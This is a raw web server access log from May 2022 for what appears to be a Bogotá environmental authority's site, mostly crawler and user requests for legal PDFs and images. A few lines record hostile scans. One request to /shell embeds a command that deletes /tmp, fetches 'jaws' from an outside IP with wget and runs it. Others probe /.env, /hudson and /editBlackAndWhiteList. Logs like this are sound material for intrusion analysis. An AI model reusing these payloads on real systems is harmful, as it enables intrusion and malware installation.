186.82.135.123 - - [28/May/2022:00:42:09 -0500] "GET /conoce-los-requisitos-ambientales-para-abrir-un-establecimiento-comercial-en-bogota.html?fbclid=IwAR0iWA4OLT-0m7qlOq0zel4-KOG3uQ0513h11QETs6W2iZJ02HQM6utBJ2A HTTP/1.1" 200 796
172.22.2.4 - - [28/May/2022:00:40:48 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [28/May/2022:00:41:42 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46771
172.22.2.4 - - [28/May/2022:00:41:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
201.245.192.253 - - [28/May/2022:00:42:33 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44100
207.46.13.179 - - [28/May/2022:00:45:44 -0500] "GET /bla/resoluciones/resoluciones%202012/0484.pdf HTTP/1.1" 200 867805
157.55.39.8 - - [28/May/2022:00:46:26 -0500] "GET /BLA/resoluciones/AUTOS%202020/0124.pdf HTTP/1.1" 304 -
66.249.65.17 - - [28/May/2022:00:46:34 -0500] "-" 408 -
216.245.221.92 - - [28/May/2022:00:46:54 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/May/2022:00:46:38 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/May/2022:00:47:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
172.22.2.4 - - [28/May/2022:00:50:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
216.245.221.92 - - [28/May/2022:00:51:54 -0500] "HEAD / HTTP/1.1" 200 -
66.249.65.13 - - [28/May/2022:00:52:31 -0500] "-" 408 -
173.252.107.116 - - [28/May/2022:00:54:01 -0500] "GET /images/la-vieja-mayo-24.jpg HTTP/1.1" 200 58217
172.22.2.4 - - [28/May/2022:00:52:28 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/May/2022:00:53:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
172.22.2.4 - - [28/May/2022:00:55:04 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
152.61.192.232 - - [28/May/2022:00:56:34 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.192.232 - - [28/May/2022:00:56:35 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.192.232 - - [28/May/2022:00:56:35 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
172.22.2.4 - - [28/May/2022:00:55:07 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 63427
216.245.221.92 - - [28/May/2022:00:56:54 -0500] "HEAD / HTTP/1.1" 200 -
66.249.65.13 - - [28/May/2022:00:58:17 -0500] "-" 408 -
157.55.39.8 - - [28/May/2022:00:58:56 -0500] "GET /bla/resoluciones/resoluciones%202012/0141.pdf HTTP/1.1" 200 264291
172.22.2.4 - - [28/May/2022:00:58:18 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
157.55.39.43 - - [28/May/2022:01:00:38 -0500] "GET /bla/resoluciones/autos%202008/1408.pdf HTTP/1.1" 200 202290
172.22.2.4 - - [28/May/2022:00:59:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
216.245.221.92 - - [28/May/2022:01:01:54 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.15 - - [28/May/2022:01:03:40 -0500] "GET /BLA/resoluciones/AUTOS%202018/5651.pdf HTTP/1.1" 304 -
172.22.2.4 - - [28/May/2022:01:04:08 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
207.46.13.179 - - [28/May/2022:01:06:35 -0500] "GET /bla/resoluciones/resoluciones%202012/1491.pdf HTTP/1.1" 200 3970144
172.22.2.4 - - [28/May/2022:01:04:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
216.245.221.92 - - [28/May/2022:01:06:54 -0500] "HEAD / HTTP/1.1" 200 -
31.13.127.4 - - [28/May/2022:01:07:23 -0500] "GET /images/control-madera-ilegal-24-mayo.jpg HTTP/1.1" 200 48269
192.241.215.216 - - [28/May/2022:01:07:54 -0500] "GET / HTTP/1.1" 200 319
66.249.65.13 - - [28/May/2022:01:09:10 -0500] "-" 408 -
198.235.24.33 - - [28/May/2022:01:11:36 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [28/May/2022:01:09:58 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [28/May/2022:01:11:54 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/May/2022:01:10:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
157.55.39.8 - - [28/May/2022:01:16:28 -0500] "GET /Publicaciones/2022EE83615.pdf HTTP/1.1" 404 227
216.245.221.92 - - [28/May/2022:01:16:54 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/May/2022:01:15:48 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/May/2022:01:16:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
173.252.107.20 - - [28/May/2022:01:21:09 -0500] "GET /images/jardines-verticales-plantas-24-mayo.jpg HTTP/1.1" 200 148288
114.119.136.78 - - [28/May/2022:01:21:24 -0500] "-" 408 -
216.245.221.92 - - [28/May/2022:01:21:54 -0500] "HEAD / HTTP/1.1" 200 -
114.119.151.72 - - [28/May/2022:01:21:55 -0500] "-" 408 -
172.22.2.4 - - [28/May/2022:01:21:20 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
114.119.152.56 - - [28/May/2022:01:22:27 -0500] "-" 408 -
201.245.192.253 - - [28/May/2022:01:21:42 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46630
172.22.2.4 - - [28/May/2022:01:21:38 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [28/May/2022:01:22:34 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44104
172.22.2.4 - - [28/May/2022:01:22:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58029
172.22.2.4 - - [28/May/2022:01:23:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
66.249.65.13 - - [28/May/2022:01:24:54 -0500] "-" 408 -
216.245.221.92 - - [28/May/2022:01:26:54 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/May/2022:01:27:28 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
152.61.128.50 - - [28/May/2022:01:29:18 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
172.22.2.4 - - [28/May/2022:01:28:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
152.61.128.50 - - [28/May/2022:01:29:20 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.128.50 - - [28/May/2022:01:29:20 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
172.22.2.4 - - [28/May/2022:01:27:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 48596
172.22.2.4 - - [28/May/2022:01:28:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52557
173.252.127.13 - - [28/May/2022:01:30:26 -0500] "GET /sumate-a-las-jornadas-de-recoleccion-de-llantas-de-esta-semana.html HTTP/1.1" 206 787
216.245.221.92 - - [28/May/2022:01:31:54 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/May/2022:01:31:42 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46630
201.245.192.253 - - [28/May/2022:01:32:33 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44104
66.249.65.13 - - [28/May/2022:01:34:23 -0500] "-" 408 -
172.22.2.4 - - [28/May/2022:01:33:18 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
157.55.39.127 - - [28/May/2022:01:35:35 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12492
172.22.2.4 - - [28/May/2022:01:34:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
186.28.104.243 - - [28/May/2022:01:36:43 -0500] "GET /conoce-los-requisitos-ambientales-para-abrir-un-establecimiento-comercial-en-bogota.html?fbclid=IwAR1HuwG8uA4Rj3jAtU5ZXfG9w5x9xCymjtjUDbhpR5rCZbamDB4zYu9FQLI HTTP/1.1" 200 796
157.55.39.15 - - [28/May/2022:01:36:46 -0500] "GET /bla/resoluciones/resoluciones%202012/1539.pdf HTTP/1.1" 200 320635
216.245.221.92 - - [28/May/2022:01:36:54 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.43 - - [28/May/2022:01:37:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/4589.pdf HTTP/1.1" 200 344924
173.252.107.1 - - [28/May/2022:01:38:18 -0500] "GET /images/jardines-verticales-plantas-24-mayo.jpg HTTP/1.1" 200 148288
172.22.2.4 - - [28/May/2022:01:39:08 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/May/2022:01:39:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
216.245.221.92 - - [28/May/2022:01:41:54 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.8 - - [28/May/2022:01:42:09 -0500] "GET /BLA/resoluciones/AUTOS%202020/1074.pdf HTTP/1.1" 304 -
201.245.192.253 - - [28/May/2022:01:41:42 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46630
157.55.39.15 - - [28/May/2022:01:42:38 -0500] "GET /BLA/resoluciones/AUTOS%202019/2181.pdf HTTP/1.1" 304 -
201.245.192.253 - - [28/May/2022:01:42:33 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44104
66.249.65.13 - - [28/May/2022:01:44:38 -0500] "-" 408 -
157.55.39.127 - - [28/May/2022:01:45:17 -0500] "GET /BLA/resoluciones/AUTOS%202020/2735.pdf HTTP/1.1" 304 -
172.22.2.4 - - [28/May/2022:01:44:58 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [28/May/2022:01:46:54 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/May/2022:01:45:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60581
157.55.39.15 - - [28/May/2022:01:47:59 -0500] "GET /bla/resoluciones/resoluciones%202022/0139.pdf HTTP/1.1" 200 793893
110.42.215.214 - - [28/May/2022:01:50:14 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+2.56.57.238/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
157.55.39.8 - - [28/May/2022:01:50:31 -0500] "GET /bla/resoluciones/resoluciones%202012/0676.pdf HTTP/1.1" 200 1397011
216.245.221.92 - - [28/May/2022:01:51:54 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.15 - - [28/May/2022:01:52:10 -0500] "GET /bla/resoluciones/resoluciones%202012/0821.pdf HTTP/1.1" 200 291659
172.22.2.4 - - [28/May/2022:01:50:48 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.65.13 - - [28/May/2022:01:53:15 -0500] "-" 408 -
172.22.2.4 - - [28/May/2022:01:51:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
157.55.39.43 - - [28/May/2022:01:54:33 -0500] "GET /bla/resoluciones/resoluciones%202012/1009.pdf HTTP/1.1" 200 589720
157.55.39.127 - - [28/May/2022:01:55:37 -0500] "GET /bla/resoluciones/resoluciones%202012/0327.pdf HTTP/1.1" 200 215453
157.55.39.43 - - [28/May/2022:01:55:53 -0500] "GET /bla/resoluciones/resoluciones%202012/1845.pdf HTTP/1.1" 200 541196
216.245.221.92 - - [28/May/2022:01:56:54 -0500] "HEAD / HTTP/1.1" 200 -
39.125.189.5 - - [28/May/2022:01:57:16 -0500] "POST /editBlackAndWhiteList HTTP/1.1" 404 1018
157.55.39.15 - - [28/May/2022:01:58:00 -0500] "GET /Publicaciones/2022EE78988.pdf HTTP/1.1" 404 227
172.22.2.4 - - [28/May/2022:01:56:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/May/2022:01:57:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
157.55.39.43 - - [28/May/2022:01:59:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2820.pdf HTTP/1.1" 304 -
31.13.127.9 - - [28/May/2022:02:01:22 -0500] "GET /images/jardines-verticales-plantas-24-mayo.jpg HTTP/1.1" 200 148288
216.245.221.92 - - [28/May/2022:02:01:54 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.179 - - [28/May/2022:02:02:31 -0500] "GET /bla/resoluciones/resoluciones%202012/0885.pdf HTTP/1.1" 200 443099
207.46.13.146 - - [28/May/2022:02:02:33 -0500] "GET /BLA/resoluciones/AUTOS%202018/0941.pdf HTTP/1.1" 200 281095
157.55.39.127 - - [28/May/2022:02:02:38 -0500] "GET /bla/resoluciones/resoluciones%202012/0784.pdf HTTP/1.1" 200 443125
66.249.65.13 - - [28/May/2022:02:02:47 -0500] "-" 408 -
172.22.2.4 - - [28/May/2022:02:02:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
207.46.13.67 - - [28/May/2022:02:04:11 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [28/May/2022:02:03:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
157.55.39.127 - - [28/May/2022:02:05:57 -0500] "GET /bla/resoluciones/resoluciones%201998/RESOLUCION%201127%20DE%201998.pdf HTTP/1.1" 200 118947
216.245.221.92 - - [28/May/2022:02:06:53 -0500] "HEAD / HTTP/1.1" 200 -
178.79.169.97 - - [28/May/2022:02:07:53 -0500] "GET /portaldeninos/ HTTP/1.1" 200 109662
199.16.157.181 - - [28/May/2022:02:07:59 -0500] "GET /images/actividades-dia-tierra-22-abril.jpg HTTP/1.1" 200 77276
66.249.65.13 - - [28/May/2022:02:09:04 -0500] "-" 408 -
128.14.136.18 - - [28/May/2022:02:09:08 -0500] "GET /portaldeninos/ HTTP/1.1" 200 109662
207.46.13.179 - - [28/May/2022:02:09:20 -0500] "GET /bla/resoluciones/notificaciones/autos%202016/03184.pdf HTTP/1.1" 200 353825
172.22.2.4 - - [28/May/2022:02:08:18 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/May/2022:02:09:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
216.245.221.92 - - [28/May/2022:02:11:54 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.15 - - [28/May/2022:02:12:13 -0500] "GET /BLA/resoluciones/AUTOS%202019/2060.pdf HTTP/1.1" 304 -
172.22.2.4 - - [28/May/2022:02:12:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
162.142.125.221 - - [28/May/2022:02:14:06 -0500] "GET / HTTP/1.1" 200 319
162.142.125.221 - - [28/May/2022:02:14:06 -0500] "GET / HTTP/1.1" 200 319
162.142.125.221 - - [28/May/2022:02:14:07 -0500] "PRI * HTTP/2.0" 400 946
66.249.65.13 - - [28/May/2022:02:15:13 -0500] "-" 408 -
207.46.13.146 - - [28/May/2022:02:15:23 -0500] "GET /bla/resoluciones/autos%202008/0564.pdf HTTP/1.1" 200 138988
172.22.2.4 - - [28/May/2022:02:14:08 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
207.46.13.179 - - [28/May/2022:02:16:03 -0500] "GET /bla/resoluciones/resoluciones%202012/1913.pdf HTTP/1.1" 200 422045
172.22.2.4 - - [28/May/2022:02:14:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53831
216.245.221.92 - - [28/May/2022:02:16:54 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.8 - - [28/May/2022:02:18:24 -0500] "GET /bla/resoluciones/resoluciones%202012/0241.pdf HTTP/1.1" 200 258930
157.55.39.43 - - [28/May/2022:02:19:55 -0500] "GET /bla/resoluciones/resoluciones%202012/0739.pdf HTTP/1.1" 200 587481
172.22.2.4 - - [28/May/2022:02:19:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56364
157.55.39.43 - - [28/May/2022:02:20:55 -0500] "GET /bla/resoluciones/resoluciones%202012/1043.pdf HTTP/1.1" 200 306487
66.249.65.13 - - [28/May/2022:02:21:16 -0500] "-" 408 -
172.22.2.4 - - [28/May/2022:02:19:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [28/May/2022:02:21:53 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/May/2022:02:21:41 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46622
172.22.2.4 - - [28/May/2022:02:20:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60581
201.245.192.253 - - [28/May/2022:02:22:29 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44097
157.55.39.8 - - [28/May/2022:02:23:25 -0500] "GET /BLA/resoluciones/AUTOS%202018/2617.pdf HTTP/1.1" 304 -
69.63.189.20 - - [28/May/2022:02:24:56 -0500] "GET /images/operativos-residuos-peligrosos-25-ABRIL.jpg HTTP/1.1" 200 35345
157.55.39.106 - - [28/May/2022:02:25:43 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisC-746-12.docx HTTP/1.1" 304 -
207.46.13.179 - - [28/May/2022:02:26:13 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2011%2F HTTP/1.1" 200 629736
157.55.39.8 - - [28/May/2022:02:26:27 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2008%2F HTTP/1.1" 200 569644
216.245.221.92 - - [28/May/2022:02:26:54 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.43 - - [28/May/2022:02:27:15 -0500] "GET /Publicaciones/2022EE82527.pdf HTTP/1.1" 404 227
34.90.76.109 - - [28/May/2022:02:27:17 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [28/May/2022:02:25:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.65.13 - - [28/May/2022:02:27:39 -0500] "-" 408 -
207.46.13.179 - - [28/May/2022:02:26:16 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 43469
172.22.2.4 - - [28/May/2022:02:26:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 49000
207.46.13.146 - - [28/May/2022:02:31:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202006/RES%202006%201401-1450/00001426.tif HTTP/1.1" 200 261352
172.22.2.4 - - [28/May/2022:02:30:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
216.245.221.92 - - [28/May/2022:02:31:54 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/May/2022:02:31:42 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46622
207.46.13.146 - - [28/May/2022:02:32:44 -0500] "GET /BLA/resoluciones/AUTOS%202011/5211.pdf HTTP/1.1" 200 219111
157.55.39.8 - - [28/May/2022:02:32:44 -0500] "GET /BLA/resoluciones/AUTOS%202011/2491.pdf HTTP/1.1" 200 611721
20.96.170.139 - - [28/May/2022:02:32:34 -0500] "GET /noticias/rssambiente.php HTTP/1.1" 406 -
20.96.170.139 - - [28/May/2022:02:32:35 -0500] "GET /noticias/rssambiente.php HTTP/1.1" 406 -
201.245.192.253 - - [28/May/2022:02:32:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44097
172.22.2.4 - - [28/May/2022:02:31:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.65.13 - - [28/May/2022:02:33:31 -0500] "-" 408 -
172.22.2.4 - - [28/May/2022:02:32:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57520
172.22.2.4 - - [28/May/2022:02:34:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
207.46.13.179 - - [28/May/2022:02:35:04 -0500] "GET /BLA/resoluciones/AUTOS%202019/3708.pdf HTTP/1.1" 304 -
157.55.39.43 - - [28/May/2022:02:36:18 -0500] "GET /bla/resoluciones/resoluciones%202012/1336.pdf HTTP/1.1" 200 395251
216.245.221.92 - - [28/May/2022:02:36:53 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.15 - - [28/May/2022:02:38:28 -0500] "GET /bla/resoluciones/resoluciones%202012/0311.pdf HTTP/1.1" 200 472455
172.22.2.4 - - [28/May/2022:02:37:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.65.13 - - [28/May/2022:02:39:42 -0500] "-" 408 -
172.22.2.4 - - [28/May/2022:02:38:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
157.55.39.15 - - [28/May/2022:02:40:18 -0500] "GET /bla/resoluciones/resoluciones%202012/0936.pdf HTTP/1.1" 200 583746
172.22.2.4 - - [28/May/2022:02:41:13 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [28/May/2022:02:41:13 -0500] "GET /BLA/boletinlegal/Directivas/2016/Directiva%20No.%2001%20del%2012%20de%20Abril%20de%202016.pdf HTTP/1.1" 200 868354
216.245.221.92 - - [28/May/2022:02:41:54 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/May/2022:02:41:42 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46622
201.245.192.253 - - [28/May/2022:02:42:28 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44097
172.22.2.4 - - [28/May/2022:02:43:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/May/2022:02:44:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
66.249.65.15 - - [28/May/2022:02:45:53 -0500] "-" 408 -
216.245.221.92 - - [28/May/2022:02:46:54 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/May/2022:02:49:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/May/2022:02:49:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
216.245.221.92 - - [28/May/2022:02:51:54 -0500] "HEAD / HTTP/1.1" 200 -
66.249.65.13 - - [28/May/2022:02:52:07 -0500] "-" 408 -
207.46.13.146 - - [28/May/2022:02:55:16 -0500] "GET /bla/resoluciones/resoluciones%202012/1154.pdf HTTP/1.1" 200 375546
172.22.2.4 - - [28/May/2022:02:54:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [28/May/2022:02:56:53 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/May/2022:02:55:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
66.249.65.13 - - [28/May/2022:02:57:58 -0500] "-" 408 -
216.245.221.92 - - [28/May/2022:03:01:53 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/May/2022:03:00:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/May/2022:03:03:10 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%209%20del%2021%20de%20Agosto%20de%202012.pdf HTTP/1.1" 304 -
172.22.2.4 - - [28/May/2022:03:01:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
207.46.13.179 - - [28/May/2022:03:04:39 -0500] "GET /bla/resoluciones/resoluciones%202012/1554.pdf HTTP/1.1" 200 3178718
66.249.65.13 - - [28/May/2022:03:04:53 -0500] "-" 408 -
216.245.221.92 - - [28/May/2022:03:06:53 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.179 - - [28/May/2022:03:07:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/1554.pdf HTTP/1.1" 304 -
207.46.13.146 - - [28/May/2022:03:07:58 -0500] "GET /bla/resoluciones/resoluciones%202012/1876.pdf HTTP/1.1" 200 423682
172.22.2.4 - - [28/May/2022:03:06:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/May/2022:03:07:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
157.55.39.43 - - [28/May/2022:03:09:30 -0500] "GET /bla/resoluciones/resoluciones%202012/1563.pdf HTTP/1.1" 200 1241532
66.249.65.13 - - [28/May/2022:03:10:49 -0500] "-" 408 -
216.245.221.92 - - [28/May/2022:03:11:54 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/May/2022:03:12:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
31.13.103.24 - - [28/May/2022:03:14:14 -0500] "GET /images/jardines-verticales-plantas-24-mayo.jpg HTTP/1.1" 200 148288
172.22.2.4 - - [28/May/2022:03:13:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
207.46.13.146 - - [28/May/2022:03:16:29 -0500] "GET /bla/resoluciones/resoluciones%202012/0948.pdf HTTP/1.1" 200 871067
216.245.221.92 - - [28/May/2022:03:16:54 -0500] "HEAD / HTTP/1.1" 200 -
66.249.65.13 - - [28/May/2022:03:17:06 -0500] "-" 408 -
157.55.39.43 - - [28/May/2022:03:18:01 -0500] "GET /bla/resoluciones/resoluciones%202012/0522.pdf HTTP/1.1" 200 968016
172.22.2.4 - - [28/May/2022:03:18:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
157.55.39.8 - - [28/May/2022:03:20:20 -0500] "GET /bla/resoluciones/resoluciones%202012/0963.pdf HTTP/1.1" 200 342407
172.22.2.4 - - [28/May/2022:03:19:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
157.55.39.15 - - [28/May/2022:03:20:56 -0500] "GET /bla/resoluciones/resoluciones%202012/0935.pdf HTTP/1.1" 200 456756
157.55.39.15 - - [28/May/2022:03:21:16 -0500] "GET /bla/resoluciones/resoluciones%202012/0205.pdf HTTP/1.1" 200 379109
216.245.221.92 - - [28/May/2022:03:21:54 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/May/2022:03:21:41 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46760
66.249.65.13 - - [28/May/2022:03:22:54 -0500] "-" 408 -
66.249.73.3 - - [28/May/2022:03:22:58 -0500] "GET /para-prevenir-riesgo-sobre-la-ciudadania-distrito-intervendra-eucalipto-de-gran-porte-en-usaquen.html HTTP/1.1" 200 841
201.245.192.253 - - [28/May/2022:03:22:34 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44105
207.46.13.179 - - [28/May/2022:03:24:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2571.pdf HTTP/1.1" 304 -
79.110.73.9 - - [28/May/2022:03:24:52 -0500] "GET /bla/resoluciones/resoluciones%202012/1108.pdf HTTP/1.1" 200 1429006
172.22.2.4 - - [28/May/2022:03:24:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/May/2022:03:24:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
216.245.221.92 - - [28/May/2022:03:26:54 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.5 - - [28/May/2022:03:27:47 -0500] "GET /para-prevenir-riesgo-sobre-la-ciudadania-distrito-intervendra-eucalipto-de-gran-porte-en-usaquen.html HTTP/1.1" 200 841
109.237.103.9 - - [28/May/2022:03:28:00 -0500] "GET /.env HTTP/1.1" 404 1018
109.237.103.9 - - [28/May/2022:03:28:00 -0500] "\x16\x03\x01\x01D\x01" 400 226
66.249.65.13 - - [28/May/2022:03:30:12 -0500] "-" 408 -
157.55.39.127 - - [28/May/2022:03:31:15 -0500] "GET /bla/resoluciones/resoluciones%202012/0729.pdf HTTP/1.1" 200 176418
172.22.2.4 - - [28/May/2022:03:29:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [28/May/2022:03:31:54 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/May/2022:03:30:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58029
201.245.192.253 - - [28/May/2022:03:31:42 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46760
201.245.192.253 - - [28/May/2022:03:32:32 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44105
157.55.39.127 - - [28/May/2022:03:33:45 -0500] "GET /bla/resoluciones/notificaciones/autos%202016/00640.doc HTTP/1.1" 200 195020
192.241.221.207 - - [28/May/2022:03:34:03 -0500] "GET /hudson HTTP/1.1" 404 1018
